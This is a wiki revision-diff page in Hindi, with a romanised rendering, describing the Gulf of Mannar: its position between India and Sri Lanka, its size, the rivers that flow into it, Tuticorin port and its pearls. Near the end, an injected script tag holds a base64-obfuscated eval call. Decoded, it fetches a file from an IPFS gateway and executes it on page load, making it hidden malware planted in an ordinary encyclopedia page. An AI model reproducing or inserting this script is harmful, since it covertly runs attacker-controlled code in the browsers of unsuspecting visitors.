Difference between revisions of "मन्नार की खाड़ी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:भूगोल शब्दावली (को हटा दिया गया हैं।))
Line 1: Line 1:
'''मन्नार की खाड़ी''' दक्षिण-पूर्वी [[भारत]] और पश्चिमी [[श्रीलंका]] के बीच [[हिंद महासागर]] का प्रवेश मार्ग है।  
+
'''मन्नार की खाड़ी''' दक्षिण-पूर्वी [[भारत]] और पश्चिमी [[श्रीलंका]] के बीच [[हिंद महासागर]] का प्रवेश मार्ग है।
 +
 
 
*मन्नार की खाड़ी की सीमा पर पूर्वोत्तर में रामेश्वरम (द्धीप) आदम का पुल (राम –सॆतु, उथले तटों की श्रृंखला) और मन्नार द्धीप है।  
 
*मन्नार की खाड़ी की सीमा पर पूर्वोत्तर में रामेश्वरम (द्धीप) आदम का पुल (राम –सॆतु, उथले तटों की श्रृंखला) और मन्नार द्धीप है।  
 
*यह खाड़ी 130 से 275 किमी चौड़ी और 160 किमी लंबी है।  
 
*यह खाड़ी 130 से 275 किमी चौड़ी और 160 किमी लंबी है।  
*इसमे ताम्रपर्णी (भारत) और अरुवी (श्रीलंका) नदी सहित अनेक नदियाँ मिलती है।  
+
*इसमे [[ताम्रपर्णी नदी]] ([[भारत]]) और अरुवी ([[श्रीलंका]]) सहित अनेक नदियाँ मिलती है।  
 
*[[टुटिकोरिन]] बंदरगाह भारतीय समुद्र तट पर है।  
 
*[[टुटिकोरिन]] बंदरगाह भारतीय समुद्र तट पर है।  
 
*मन्नार की खाड़ी श्रीलंका तट के पास मिलने वाले मोतियों के लिए जानी जाती है।  
 
*मन्नार की खाड़ी श्रीलंका तट के पास मिलने वाले मोतियों के लिए जानी जाती है।  

Revision as of 07:52, 6 September 2012

mannar ki kha di dakshin-poorvi bharat aur pashchimi shrilanka ke bich hiand mahasagar ka pravesh marg hai.

  • mannar ki kha di ki sima par poorvottar mean rameshvaram (ddhip) adam ka pul (ram –sॆtu, uthale tatoan ki shrriankhala) aur mannar ddhip hai.
  • yah kha di 130 se 275 kimi chau di aur 160 kimi lanbi hai.
  • isame tamraparni nadi (bharat) aur aruvi (shrilanka) sahit anek nadiyaan milati hai.
  • tutikorin bandaragah bharatiy samudr tat par hai.
  • mannar ki kha di shrilanka tat ke pas milane vale motiyoan ke lie jani jati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh